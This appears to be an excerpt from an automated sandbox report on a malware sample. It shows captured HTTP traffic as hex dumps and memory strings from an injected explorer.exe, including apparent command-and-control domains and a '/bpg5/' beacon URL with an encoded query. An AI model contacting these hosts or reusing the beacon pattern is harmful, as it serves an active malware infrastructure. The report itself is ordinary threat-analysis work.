          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 May 2023 07:39:26 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 May 2023 07:39:28 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 May 2023 07:39:32 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 May 2023 07:40:05 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: LiteSpeedx-powered-by: PHP/8.1.19expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://rt66omm.com/wp-json/>; rel="https://api.w.org/"content-encoding: gzipvary: Accept-Encoding,Accept-Encodingx-turbo-charged-by: LiteSpeedData Raw: 66 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd db 8e e4 48 b2 18 f8 2b 3c 95 68 75 46 4f 30 8a 8c 7b 32 bb 4a 07 3a 82 04 69 57 17 68 25 48 42 a3 91 f0 20 3d 22 d8 c5 20 39 24 23 2f 9d 2a 3d 68 5e 76 3f 60 3f 60 a1 4f d0 83 5e f6 49 bf 32 3f 22 98 b9 3b e9 37 32 c8 60 e4 cc 81 a0 69 74 4d 17 c3 dd cc dc dc dc dd cc dc dc ec e7 bf 89 b2 b0 7a cb a9 73 ac 4e c9 d7 9f e1 4f 27 21 e9 e1 cb a7 df c8 a7 af 3f 1f 29 89 be fe 7c a2 15 71 c2 23 29 4a 5a 7d f9 74 ae f6 ee f6 13 ff 9a 92 13 fd f2 e9 39 a6 2f 79 56 54 9f 9c 30 4b 2b 9a 56 5f 3e bd c4 51 75 fc 12 d1 e7 38 a4 2e fe 65 ea c4 69 5c c5 24 71 cb 90 24 f4 8b 3f f3 a6 8e e8 e9 ee e3 ea 4b 98 3d d3 42 85 5c d0 3d 2d 0a 5a 48 90 d3 cc 15 5f dd 97 23 4d dd 28 7b 49 0f 05 89 a8 da 75 9f 15 27 52 b9 11 ad 68 58 c5 59 2a 81 a8 68 42 f3 63 96 d2 2f 69 f6 e9 eb cf 49 9c 7e 73 0a 9a 7c f9 94 17 34 cc d2 94 86 95 13 a5 a5 9b 03 a2 2a 3c 7e 72 8e 05 dd 7f f9 f4 f9 f3 cb cb cb ec 90 65 87 84 56 e4 70 22 29 39 d0 62 16 66 a7 6b a1 b8 24 25 c9 5b 15 87 e5 70 28 e4 37 f2 ca 89 21 79 7c 05 80 30 4a 7f 2b 67 61 92 9d a3 7d 42 0a 3a 9c 84 9c 1c 28 89 e6 9c 8a f2 2d 8d e2 90 00 b3 87 83 62 5c 25 51 39 3b cc a2 ec bc 4b 68 98 c4 e1 b7 59 4a ab 61 cc ad f2 f0 16 f4 90 68 1c 19 28 29 65 45 aa 38 1c ce 8c b0 a4 7c 0c c3 fb ee b3 b4 2a af 47 cd bb a3 8c 5f 29 56 a7 72 f6 c7 33 49 ab 92 16 cf 57 08 55 49 c3 73 41 67 87 82 3c 93 8a 5c b1 bc c2 28 9d c9 b2 58 bd c4 a7 c3 70 46 02 98 df ca 88 26 f1 73 31 5c 0c e3 13 39 d0 d2 dd d3 59 59 26 2e ff 1b 39 91 df af 59 1c 61 76 ca 13 8a 0b eb 5a 10 a7 d9 89 46 31 71 af ed 1f cf 4e 59 79 8c 4f d9 70 46 92 53 32 7b 26 c9 99 86 d9 e9 44 8b f0 0a 99 88 48 12 de 00 c6 ee 32 8c 24 23 d1 27 87 94 5f 3e c1 4a f8 e4 c0 e9 c8 fe fb f3 4b b6 df 8b a3 e0 58 55 79 f0 f9 73 51 ad d7 d9 e9 04 3c f9 fc 92 bb fc f8 fb 5c 1d e9 89 96 9f c3 2c cc b2 d4 3d 91 b2 a2 c5 e7 17 ba c3 c5 f5 39 0e b3 53 96 a5 9f 95 bf cd 18 f4 b0 c8 ca 32 2b e2 43 9c 6a 07 d3 05 c2 e6 b7 a0 0c 28 22 2f b4 cc 4e 94 53 27 7d 71 f9 00 90 d2 f9 3f 7c fe b2 9c 6d 66 de 27 47 21 b9 8a ab 84 7e 5d 7a 4b e7 5f fe ab 7f eb fc 93 7f f5 ef fe e5 3f 76 fe 93 f3 6f b2 73 45 9d f5 da c9 52 e7 5f bc 39 ff 22 4e a3 9f 3f b3 a6 4c bb 40 3d e2 c7 22 db 65 55 f9 63 ad 45 fc 78 22 af 6c e9 c0 51 0c ba 42 90 90 e2 40 7f fc cc d5 8f bc c8 72 5a 54 6f 5f 3e 65 87 00 66 4a d6 40 e8 ae 8c ab 5a 29 50 9a 46 b4 0c 8b 38 d7 d4 82 7f 12 a7 11 50 58 53 fb ef 8f a4 72 fe 63 76 76 fe cf ac ac fe 46 a8 17 2a 52 18 af 84 55 1d b9 f3 9f 1c db d8 ad 90 ce 45 22 c1 01 f9 2a 35 01 5b 7a Data Ascii: f34
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 May 2023 07:40:08 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: LiteSpeedx-powered-by: PHP/8.1.19expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://rt66omm.com/wp-json/>; rel="https://api.w.org/"content-encoding: gzipvary: Accept-Encoding,Accept-Encodingx-turbo-charged-by: LiteSpeedData Raw: 31 39 66 33 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd db 8e e4 48 b2 18 f8 2b 3c 95 68 75 46 4f 30 8a 8c 7b 32 bb 4a 07 3a 82 04 69 57 17 68 25 48 42 a3 91 f0 20 3d 22 d8 c5 20 39 24 23 2f 9d 2a 3d 68 5e 76 3f 60 3f 60 a1 4f d0 83 5e f6 49 bf 32 3f 22 98 b9 3b e9 37 32 c8 60 e4 cc 81 a0 69 74 4d 17 c3 dd cc dc dc dc dd cc dc dc ec e7 bf 89 b2 b0 7a cb a9 73 ac 4e c9 d7 9f e1 4f 27 21 e9 e1 cb a7 df c8 a7 af 3f 1f 29 89 be fe 7c a2 15 71 c2 23 29 4a 5a 7d f9 74 ae f6 ee f6 13 ff 9a 92 13 fd f2 e9 39 a6 2f 79 56 54 9f 9c 30 4b 2b 9a 56 5f 3e bd c4 51 75 fc 12 d1 e7 38 a4 2e fe 65 ea c4 69 5c c5 24 71 cb 90 24 f4 8b 3f f3 a6 8e e8 e9 ee e3 ea 4b 98 3d d3 42 85 5c d0 3d 2d 0a 5a 48 90 d3 cc 15 5f dd 97 23 4d dd 28 7b 49 0f 05 89 a8 da 75 9f 15 27 52 b9 11 ad 68 58 c5 59 2a 81 a8 68 42 f3 63 96 d2 2f 69 f6 e9 eb cf 49 9c 7e 73 0a 9a 7c f9 94 17 34 cc d2 94 86 95 13 a5 a5 9b 03 a2 2a 3c 7e 72 8e 05 dd 7f f9 f4 f9 f3 cb cb cb ec 90 65 87 84 56 e4 70 22 29 39 d0 62 16 66 a7 6b a1 b8 24 25 c9 5b 15 87 e5 70 28 e4 37 f2 ca 89 21 79 7c 05 80 30 4a 7f 2b 67 61 92 9d a3 7d 42 0a 3a 9c 84 9c 1c 28 89 e6 9c 8a f2 2d 8d e2 90 00 b3 87 83 62 5c 25 51 39 3b cc a2 ec bc 4b 68 98 c4 e1 b7 59 4a ab 61 cc ad f2 f0 16 f4 90 68 1c 19 28 29 65 45 aa 38 1c ce 8c b0 a4 7c 0c c3 fb ee b3 b4 2a af 47 cd bb a3 8c 5f 29 56 a7 72 f6 c7 33 49 ab 92 16 cf 57 08 55 49 c3 73 41 67 87 82 3c 93 8a 5c b1 bc c2 28 9d c9 b2 58 bd c4 a7 c3 70 46 02 98 df ca 88 26 f1 73 31 5c 0c e3 13 39 d0 d2 dd d3 59 59 26 2e ff 1b 39 91 df af 59 1c 61 76 ca 13 8a 0b eb 5a 10 a7 d9 89 46 31 71 af ed 1f cf 4e 59 79 8c 4f d9 70 46 92 53 32 7b 26 c9 99 86 d9 e9 44 8b f0 0a 99 88 48 12 de 00 c6 ee 32 8c 24 23 d1 27 87 94 5f 3e c1 4a f8 e4 c0 e9 c8 fe fb f3 4b b6 df 8b a3 e0 58 55 79 f0 f9 73 51 ad d7 d9 e9 04 3c f9 fc 92 bb fc f8 fb 5c 1d e9 89 96 9f c3 2c cc b2 d4 3d 91 b2 a2 c5 e7 17 ba c3 c5 f5 39 0e b3 53 96 a5 9f 95 bf cd 18 f4 b0 c8 ca 32 2b e2 43 9c 6a 07 d3 05 c2 e6 b7 a0 0c 28 22 2f b4 cc 4e 94 53 27 7d 71 f9 00 90 d2 f9 3f 7c fe b2 9c 6d 66 de 27 47 21 b9 8a ab 84 7e 5d 7a 4b e7 5f fe ab 7f eb fc 93 7f f5 ef fe e5 3f 76 fe 93 f3 6f b2 73 45 9d f5 da c9 52 e7 5f bc 39 ff 22 4e a3 9f 3f b3 a6 4c bb 40 3d e2 c7 22 db 65 55 f9 63 ad 45 fc 78 22 af 6c e9 c0 51 0c ba 42 90 90 e2 40 7f fc cc d5 8f bc c8 72 5a 54 6f 5f 3e 65 87 00 66 4a d6 40 e8 ae 8c ab 5a 29 50 9a 46 b4 0c 8b 38 d7 d4 82 7f 12 a7 11 50 58 53 fb ef 8f a4 72 fe 63 76 76 fe cf ac ac fe 46 a8 17 2a 52 18 af 84 55 1d b9 f3 9f 1c db d8 ad 90 ce 45 22 c1 01 f9 2a 35 01 Data Ascii: 19f32
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 23 May 2023 07:40:17 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Fri, 05 Oct 2018 09:13:39 GMTETag: W/"afe-57777afe91410"Content-Encoding: gzipData Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 23 May 2023 07:40:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Fri, 05 Oct 2018 09:13:39 GMTETag: W/"afe-57777afe91410"Content-Encoding: gzipData Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7
          Source: explorer.exe, 00000006.00000000.446421182.00007FFA13109000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groov
          Source: explorer.exe, 00000006.00000000.446421182.00007FFA13109000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.gro
          Source: 535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000006.00000002.668081280.0000000015D80000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://rt66omm.com/bpg5/?yDcF=WlLOtZde/S0Bb5podjoZPKpN16VixTIJ6XzrElaVf
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.42230.org
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.42230.org/bpg5/
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.42230.org/bpg5/www.42230.orgjdd=UX4BZm
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.42230.orgI
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.antalyabfe.com
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.antalyabfe.com/bpg5/
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.antalyabfe.com/bpg5/www.antalyabfe.comjdd=UX4BZm
          Source: 535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.392270268.0000000005512000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000006.00000002.653229725.0000000000921000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.424757327.000000000091F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.berlinhealthweek.com
